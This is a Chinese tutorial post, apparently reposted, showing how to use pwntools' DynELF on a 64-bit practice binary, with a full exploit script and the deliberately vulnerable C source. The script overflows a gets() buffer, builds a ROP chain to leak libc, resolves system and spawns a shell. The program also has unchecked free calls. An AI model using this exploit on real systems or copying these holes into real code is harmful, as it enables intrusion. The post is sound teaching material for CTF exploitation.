64位下pwntools中dynELF函数的使用

Posted 君莫笑hhhhhh

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了64位下pwntools中dynELF函数的使用相关的知识,希望对你有一定的参考价值。

这几天有同学问我在64位下怎么用这个函数,于是针对同一道题写了个利用dynELF的方法

编译好的程序 http://pan.baidu.com/s/1jImF95O

源码在后面

from pwn import *

elf = ELF(‘./pwn_final‘)

got_write = elf.got[‘write‘]
print ‘got_write= ‘ + hex(got_write)
call_get_name_func = 0x400966
print ‘call_get_name_func= ‘ + hex(call_get_name_func)
got_read = elf.got[‘read‘]
print "got_read: " + hex(got_read)

bss_addr = 0x6020c0

pad = ‘a‘

p = process(‘./pwn_final‘)
gdb.attach(p)

#get system address
def leak(address):
    p.recvuntil(‘please enter your name:‘)
    payload1 = pad * 56
    payload1 += p64(0x400d9a)+ p64(0) + p64(1) + p64(got_write) + p64(128) + p64(address) + p64(1) + p64(0x400d80)
    payload1 += "\x00"*56
    payload1 += p64(call_get_name_func)
    p.sendline(payload1)
    data = p.recv(128)
    print "%#x => %s" % (address, (data or ‘‘).encode(‘hex‘))
    return data

d = DynELF(leak, elf=ELF(‘./pwn_final‘))

system_addr = d.lookup(‘system‘, ‘libc‘)
print "system_addr=" + hex(system_addr)

#write system && /bin/sh
payload2 = "a"*56
payload2 += p64(0x400d96)+ p64(0) +p64(0) + p64(1) + p64(got_read) + p64(16) + p64(bss_addr) + p64(0) + p64(0x400d80)
payload2 += "\x00"*56
payload2 += p64(call_get_name_func)
p.sendline(payload2)

 
p.send(p64(system_addr))
p.send("/bin/sh\0")


p.recvuntil(‘name:‘)

# call system
payload3 = "a"*56
payload3 += p64(0x400d96)+ p64(0) +p64(0) + p64(1) + p64(bss_addr) + p64(0) + p64(0) + p64(bss_addr+8) + p64(0x400d80)
payload3 += "\x00"*56
payload3 += p64(call_get_name_func)
p.sendline(payload3)


p.interactive()

源码

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

void print_menu();
void get_name();
void add_paper();
void delete_paper();
void show_paper();
int get_num();
void get_input(char *buffer, int size, int no_should_fill_full);
void gg();

char *link_list[10];

int main()
{
    setbuf(stdout, 0);
    setbuf(stdin, 0);
    setbuf(stderr, 0);
    int choice;
    get_name();
    while (1){
        print_menu();
        choice = get_num();
        switch (choice){
            case 1:
                add_paper();
                break;
            case 2:
                delete_paper();
                break;
            case 3:
                show_paper();
                break;
            default:
                return;
        }
    }
    printf("thank you!");
}

int get_num()
{
    int result;
    char input[48];
    char *end_ptr;
    
    get_input(input, 48, 1);
    result = strtol(input, &end_ptr, 0);
    if (input == end_ptr){
        printf("%s input is not start with number!\n", input);
        result = get_num();
    }
    return result;
}

void get_input(char *buffer, int size, int no_should_fill_full)
{
    int index = 0;
    char *current_location;
    int current_input_size;
    while (1){
        current_location = buffer+index;
        current_input_size = fread(buffer+index, 1, 1, stdin);
        if (current_input_size <= 0)
            break;
        if (*current_location == ‘\n‘ && no_should_fill_full){
            if (index){
                *current_location = 0;
                return;
            }        
        }else{
            index++;
            if (index >= size)
                break;
        }
    }
}

void get_name()
{
    char name[40];
    printf("please enter your name:");
    gets(name);
}

void print_menu()
{
    puts("Welcome to use the improved paper management system!");
    puts("1 add paper");
    puts("2 delete paper");
    puts("3 show paper");
}

void show_paper()
{
    int index;
    int length;
    printf("Input the index of the paper you want to show(0-9):");
    scanf("%d", &index);
    if (index < 0 || index > 9)
        exit(1);
    printf("How long you will enter:");
    scanf("%d", &length);
    if (length < 0 || length > 2048)
        exit(1);
    write(stdout, link_list[index], length);
}

void add_paper()
{
    int index;
    int length;
    printf("Input the index you want to store(0-9):");
    scanf("%d", &index);
    if (index < 0 || index > 9)
        exit(1);
    printf("How long you will enter:");
    scanf("%d", &length);
    if (length < 0 || length > 2048)
        exit(1);
    link_list[index] = malloc(length);
    if (link_list[index] == NULL)
        exit(1);
    printf("please enter your content:");
    gets(link_list[index]);
    printf("add success!\n");
}

void delete_paper()
{
    int index;
    printf("which paper you want to delete,please enter it‘s index(0-9):");
    scanf("%d", &index);
    if (index < 0 || index > 9)
        exit(1);
    free(link_list[index]);
    puts("delete success !");
}

void gg()
{
    char name[40];
    read(stdin, name, 40);
}

 

以上是关于64位下pwntools中dynELF函数的使用的主要内容,如果未能解决你的问题,请参考以下文章

Jarvis OJ Pwn writeup

Alter Table 在 MS Access 64 位下不起作用。为啥?

使用gcc

MinHook库的使用 64位下,过滤LoadLibraryExW

如何使 WinHttpCrackUrl 在 64 位下工作

navicat for mysql 64位和32位区别,win7 64位下用32位和64位有区别吗??